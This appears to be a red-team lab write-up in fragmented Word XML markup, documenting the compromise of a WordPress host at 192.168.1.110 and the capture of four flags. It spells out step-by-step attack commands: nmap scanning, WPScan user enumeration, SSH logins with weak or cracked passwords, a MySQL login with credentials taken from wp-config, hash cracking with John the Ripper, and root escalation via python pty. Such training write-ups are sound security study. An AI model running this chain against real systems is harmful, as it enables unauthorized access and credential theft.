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em4ynfshbvmn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Red Team: Summary of Operations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cfw50l5cfdy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Table of Contents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Exposed Services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Critical Vulnerabilities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Exploitation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gmr4olu62kp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Exposed Services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Nmap scan results for each machine reveal the below services and OS details:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sS -n -p- -vv -O 192.168.1.110</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5419725" cy="4876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scan identifies the services below as potential points of entry:</w:t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Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360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Port 22/TCP Open SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360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Port 80/TCP Open HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360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Port 111/TCP Open rpcbind</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360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Port 139/TCP Open netbios-ssn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360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Port 445/TCP Open microsoft-ds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010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color w:val="24292e"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerabilities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following vulnerabilities were identified on each target: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Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360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User Enumeration (WordPress site) </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Verdana" w:cs="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
            <w:b w:val="1"/>
            <w:color w:val="880000"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">CVE-2017-18536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5"/>
        </w:numPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360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Weak User Password </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Verdana" w:cs="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
            <w:b w:val="1"/>
            <w:color w:val="880000"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">CVE-2021-39614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5"/>
        </w:numPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360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Unsalted User Password Hash (WordPress database) </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>
        <w:tblW w:w="8880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80"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="8880"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid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0dbd2" w:space="0" w:sz="6" w:val="single"/>
              <w:right w:color="000000" w:space="0" w:sz="0" w:val="nil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Verdana" w:cs="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
                <w:b w:val="1"/>
                <w:color w:val="880000"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId9">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Verdana" w:cs="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
                  <w:b w:val="1"/>
                  <w:color w:val="880000"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">CVE-2007-6013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Verdana" w:cs="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdan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shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:before="60" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1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5"/>
        </w:numPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:before="60" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360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Misconfiguration of User Privileges/Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A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8kgrwab7ioo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Exploitation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Red Team was able to penetrate Target 1 and retrieve the following confidential data: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20">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0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Flag1: b9bbcb33ellb80be759c4e844862482d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0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Exploit Used:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:lineRule="auto"/>
        <w:ind w:left="3600" w:firstLine="0"/>
        <w:rPr>
          <w:i w:val="1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WPScan to enumerate users of the Target 1 WordPress site</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/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Command: </w:t>
      </w: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wpscan --url </w:t>
      </w:r>
      <w:hyperlink r:id="rId10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http://192.168.1.110</w:t>
        </w:r>
      </w:hyperlink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 --enumerate u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3995738" cy="57816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578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Capturing Flag 1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SSH in as Michael traversing through directories and files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Flag 1 found in the var/www/html folder at root in service.html in a HTML comment below the footer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025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b w:val="1"/>
          <w:color w:val="24292e"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none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Commands: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ssh michael@192.168.1.110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pw: michael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cd var/www/html</w:t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ls -l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nano service.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:spacing w:after="240" w:before="12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62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240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0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Flag2: fc3fd58dcdad9ab23faca6e9a3e581c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D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Exploit Used: Same as flag1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr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Capturing Flag 2: While SSH in as user Michael Flag 2 was also found.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:ind w:left="36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Once more going through directories and files as before Flag 2 was found in /var/www next to the html folder that held Flag 1.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43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Commands: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43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ssh michael@192.168.1.110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43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pw: michael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43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cd var/www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43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ls -l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43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cat flag2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="288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695950" cy="127635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Flag3: afc01ab56b50591e7dccf93122770cd2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Exploit Used:</w:t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Same exploits used to gain Flag 1 and 2.</w:t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Capturing Flag 3: Accessing MySQL database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4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Once having found wp-config.php and gaining access to the database credentials as Michael, MySQL was used to explore the database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4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Flag 3 was found in the wp_posts table in the wordpress database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4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Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr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mysql -u root -p’R@v3nSecurity’ -h 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr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show databases;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr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use wordpress;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr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show tables;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr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* from wp_posts;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
      <w:pPr>
        <w:ind w:left="28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28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180" w:lineRule="auto"/>
        <w:ind w:left="28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afterAutospacing="0" w:before="120" w:lineRule="auto"/>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="24292e"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none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Flag4: 715dea6c055b9fe3337544932f2941ce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afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="24292e"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none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Exploit Used: Unsalted password hash and the use of privilege escalation with Python.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0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="24292e"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none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Capturing Flag 4: Retrieve user credentials from database, crack password hash with John the Ripper and use Python to gain root privileges.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afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="24292e"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none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Once having gained access to the database credentials as Michael from the wp-config.php file, lifting username and password hashes using MySQL was next.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0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="24292e"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none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These user credentials are stored in the wp_users table of the wordpress database. The usernames and password hashes were copied/saved to the Kali machine in a file called wp_hashes.txt.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hd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2880" w:hanging="360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Once Steven’s password hash was cracked, the next thing to do was SSH as Steven. Then as Steven checking for privilege and escalating to root with Python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:ind w:left="360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360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028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360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36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Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr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ssh steven@192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr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pw:pink84</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr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-l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr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python -c ‘import pty;pty.spawn(“/bin/bash”)’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr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cd /root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr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ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr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cat flag4.txt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9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86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93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100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cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1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hyperlink" Target="http://192.168.1.110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ve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6013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hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18536" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3961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